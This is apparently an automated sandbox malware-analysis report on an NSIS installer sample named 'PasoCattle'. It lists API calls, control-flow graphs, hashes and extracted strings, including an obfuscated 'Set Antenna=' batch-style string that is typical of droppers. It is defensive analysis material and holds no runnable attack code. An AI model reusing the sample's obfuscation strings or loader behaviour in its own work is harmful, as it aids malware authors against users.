                                                                                                                                                                          • ShowWindow.USER32(00000005,00000000), ref: 00405BBD
                                                                                                                                                                          • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
                                                                                                                                                                          • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
                                                                                                                                                                          • GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
                                                                                                                                                                          • GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
                                                                                                                                                                          • RegisterClassW.USER32(00476A40), ref: 00405BFF
                                                                                                                                                                          • DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                          • String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                                                          • API String ID: 608394941-2746725676
                                                                                                                                                                          • Opcode ID: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                                                                                          • Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
                                                                                                                                                                          • Opcode Fuzzy Hash: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                                                                                          • Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                          • lstrcatW.KERNEL32(00000000,00000000,open,004D70B0,00000000,00000000), ref: 00401A76
                                                                                                                                                                          • CompareFileTime.KERNEL32(-00000014,?,open,open,00000000,00000000,open,004D70B0,00000000,00000000), ref: 00401AA0
                                                                                                                                                                            • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                            • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,0042A4AD,771B23A0,00000000), ref: 00404FD6
                                                                                                                                                                            • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,0042A4AD,771B23A0,00000000), ref: 00404FE6
                                                                                                                                                                            • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,0042A4AD,771B23A0,00000000), ref: 00404FF9
                                                                                                                                                                            • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                                                                                                          • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$open
                                                                                                                                                                          • API String ID: 4286501637-2478300759
                                                                                                                                                                          • Opcode ID: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                                                                                                          • Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
                                                                                                                                                                          • Opcode Fuzzy Hash: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                                                                                                          • Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 587 4035b3-403601 GetTickCount GetModuleFileNameW call 405e7c 590 403603-403608 587->590 591 40360d-40363b call 406035 call 40677d call 406035 GetFileSize 587->591 592 4037e2-4037e6 590->592 599 403641 591->599 600 403728-403736 call 4032d2 591->600 602 403646-40365d 599->602 606 4037f1-4037f6 600->606 607 40373c-40373f 600->607 604 403661-403663 call 403336 602->604 605 40365f 602->605 611 403668-40366a 604->611 605->604 606->592 609 403741-403759 call 403368 call 403336 607->609 610 40376b-403795 GlobalAlloc call 403368 call 40337f 607->610 609->606 638 40375f-403765 609->638 610->606 636 403797-4037a8 610->636 614 403670-403677 611->614 615 4037e9-4037f0 call 4032d2 611->615 616 4036f3-4036f7 614->616 617 403679-40368d call 405e38 614->617 615->606 623 403701-403707 616->623 624 4036f9-403700 call 4032d2 616->624 617->623 634 40368f-403696 617->634 627 403716-403720 623->627 628 403709-403713 call 4072ad 623->628 624->623 627->602 635 403726 627->635 628->627 634->623 640 403698-40369f 634->640 635->600 641 4037b0-4037b3 636->641 642 4037aa 636->642 638->606 638->610 640->623 643 4036a1-4036a8 640->643 644 4037b6-4037be 641->644 642->641 643->623 645 4036aa-4036b1 643->645 644->644 646 4037c0-4037db SetFilePointer call 405e38 644->646 645->623 647 4036b3-4036d3 645->647 650 4037e0 646->650 647->606 649 4036d9-4036dd 647->649 651 4036e5-4036ed 649->651 652 4036df-4036e3 649->652 650->592 651->623 653 4036ef-4036f1 651->653 652->635 652->651 653->623
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 004035C4
                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0
                                                                                                                                                                            • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                            • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C
                                                                                                                                                                          Strings
                                                                                                                                                                          • Error launching installer, xrefs: 00403603
                                                                                                                                                                          • Null, xrefs: 004036AA
                                                                                                                                                                          • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
                                                                                                                                                                          • Inst, xrefs: 00403698
                                                                                                                                                                          • soft, xrefs: 004036A1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                                          • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                          • API String ID: 4283519449-527102705
                                                                                                                                                                          • Opcode ID: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                                                                                                                          • Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
                                                                                                                                                                          • Opcode Fuzzy Hash: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                                                                                                                          • Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 654 40337f-403398 655 4033a1-4033a9 654->655 656 40339a 654->656 657 4033b2-4033b7 655->657 658 4033ab 655->658 656->655 659 4033c7-4033d4 call 403336 657->659 660 4033b9-4033c2 call 403368 657->660 658->657 664 4033d6 659->664 665 4033de-4033e5 659->665 660->659 666 4033d8-4033d9 664->666 667 403546-403548 665->667 668 4033eb-403432 GetTickCount 665->668 671 403567-40356b 666->671 669 40354a-40354d 667->669 670 4035ac-4035af 667->670 672 403564 668->672 673 403438-403440 668->673 674 403552-40355b call 403336 669->674 675 40354f 669->675 676 4035b1 670->676 677 40356e-403574 670->677 672->671 678 403442 673->678 679 403445-403453 call 403336 673->679 674->664 687 403561 674->687 675->674 676->672 682 403576 677->682 683 403579-403587 call 403336 677->683 678->679 679->664 688 403455-40345e 679->688 682->683 683->664 691 40358d-40359f WriteFile 683->691 687->672 690 403464-403484 call 4076a0 688->690 697 403538-40353a 690->697 698 40348a-40349d GetTickCount 690->698 693 4035a1-4035a4 691->693 694 40353f-403541 691->694 693->694 696 4035a6-4035a9 693->696 694->666 696->670 697->666 699 4034e8-4034ec 698->699 700 40349f-4034a7 698->700 701 40352d-403530 699->701 702 4034ee-4034f1 699->702 703 4034a9-4034ad 700->703 704 4034af-4034e0 MulDiv wsprintfW call 404f9e 700->704 701->673 708 403536 701->708 706 403513-40351e 702->706 707 4034f3-403507 WriteFile 702->707 703->699 703->704 709 4034e5 704->709 711 403521-403525 706->711 707->694 710 403509-40350c 707->710 708->672 709->699 710->694 712 40350e-403511 710->712 711->690 713 40352b 711->713 712->711 713->672
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 004033F1
                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00403492
                                                                                                                                                                          • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
                                                                                                                                                                          • wsprintfW.USER32 ref: 004034CE
                                                                                                                                                                          • WriteFile.KERNELBASE(00000000,00000000,0042A4AD,00403792,00000000), ref: 004034FF
                                                                                                                                                                          • WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597
                                                                                                                                                                          Strings
                                                                                                                                                                          • Set Antenna=LJNgTransport-Mail-Angola-Both-Directory-klFlesh-Holders-Mx-Hugo-Guards-ZhQThread-Say-Injury-Davis-Honda-SpSoil-Wolf-True-Accidents-Theorem-Disabilities-Suggesting-Observation-DiFSlot-Fucked-Rf-Shipping-Indianapolis-mylSunset-Educators-, xrefs: 004033FD
                                                                                                                                                                          • ... %d%%, xrefs: 004034C8
                                                                                                                                                                          • pAB, xrefs: 004033AB
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CountFileTickWrite$wsprintf
                                                                                                                                                                          • String ID: ... %d%%$Set Antenna=LJNgTransport-Mail-Angola-Both-Directory-klFlesh-Holders-Mx-Hugo-Guards-ZhQThread-Say-Injury-Davis-Honda-SpSoil-Wolf-True-Accidents-Theorem-Disabilities-Suggesting-Observation-DiFSlot-Fucked-Rf-Shipping-Indianapolis-mylSunset-Educators-$pAB
                                                                                                                                                                          • API String ID: 651206458-1427982325
                                                                                                                                                                          • Opcode ID: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                                                                                          • Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
                                                                                                                                                                          • Opcode Fuzzy Hash: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                                                                                          • Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 714 404f9e-404fb1 715 404fb7-404fca 714->715 716 40506e-405070 714->716 717 404fd5-404fe1 lstrlenW 715->717 718 404fcc-404fd0 call 406831 715->718 720 404fe3-404ff3 lstrlenW 717->720 721 404ffe-405002 717->721 718->717 722 404ff5-404ff9 lstrcatW 720->722 723 40506c-40506d 720->723 724 405011-405015 721->724 725 405004-40500b SetWindowTextW 721->725 722->721 723->716 726 405017-405059 SendMessageW * 3 724->726 727 40505b-40505d 724->727 725->724 726->727 727->723 728 40505f-405064 727->728 728->723
                                                                                                                                                                          APIs
                                                                                                                                                                          • lstrlenW.KERNEL32(00445D80,0042A4AD,771B23A0,00000000), ref: 00404FD6
                                                                                                                                                                          • lstrlenW.KERNEL32(004034E5,00445D80,0042A4AD,771B23A0,00000000), ref: 00404FE6
                                                                                                                                                                          • lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,0042A4AD,771B23A0,00000000), ref: 00404FF9
                                                                                                                                                                          • SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                            • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042A4AD,771B23A0,00000000), ref: 00406902
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2740478559-0
                                                                                                                                                                          • Opcode ID: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                                                                                                          • Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
                                                                                                                                                                          • Opcode Fuzzy Hash: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                                                                                                          • Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 729 401eb9-401ec4 730 401f24-401f26 729->730 731 401ec6-401ec9 729->731 732 401f53-401f7b GlobalAlloc call 406831 730->732 733 401f28-401f2a 730->733 734 401ed5-401ee3 call 4062cf 731->734 735 401ecb-401ecf 731->735 750 4030e3-4030f2 732->750 751 402387-40238d GlobalFree 732->751 736 401f3c-401f4e call 406035 733->736 737 401f2c-401f36 call 4062cf 733->737 747 401ee4-402702 call 406831 734->747 735->731 738 401ed1-401ed3 735->738 736->751 737->736 738->734 742 401ef7-402e50 call 406035 * 3 738->742 742->750 762 402708-40270e 747->762 751->750 762->750
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                          • GlobalFree.KERNELBASE(00000000), ref: 00402387
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FreeGloballstrcpyn
                                                                                                                                                                          • String ID: Exch: stack < %d elements$Pop: stack empty$open
                                                                                                                                                                          • API String ID: 1459762280-1711415406
                                                                                                                                                                          • Opcode ID: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                                                                                                          • Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
                                                                                                                                                                          • Opcode Fuzzy Hash: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                                                                                                          • Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 764 4022fd-402325 call 40145c GetFileVersionInfoSizeW 767 4030e3-4030f2 764->767 768 40232b-402339 GlobalAlloc 764->768 768->767 770 40233f-40234e GetFileVersionInfoW 768->770 772 402350-402367 VerQueryValueW 770->772 773 402384-40238d GlobalFree 770->773 772->773 774 402369-402381 call 405f7d * 2 772->774 773->767 774->773
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                                                                                                                          • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                                                                                                                          • VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360
                                                                                                                                                                            • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                          • GlobalFree.KERNELBASE(00000000), ref: 00402387
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3376005127-0
                                                                                                                                                                          • Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                                                          • Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
                                                                                                                                                                          • Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                                                          • Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 780 402b23-402b37 GlobalAlloc 781 402b39-402b49 call 401446 780->781 782 402b4b-402b6a call 40145c WideCharToMultiByte lstrlenA 780->782 787 402b70-402b73 781->787 782->787 788 402b93 787->788 789 402b75-402b8d call 405f96 WriteFile 787->789 791 4030e3-4030f2 788->791 789->788 795 402384-40238d GlobalFree 789->795 795->791
                                                                                                                                                                          APIs
                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                                                                                                                          • lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                                                                                                                          • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
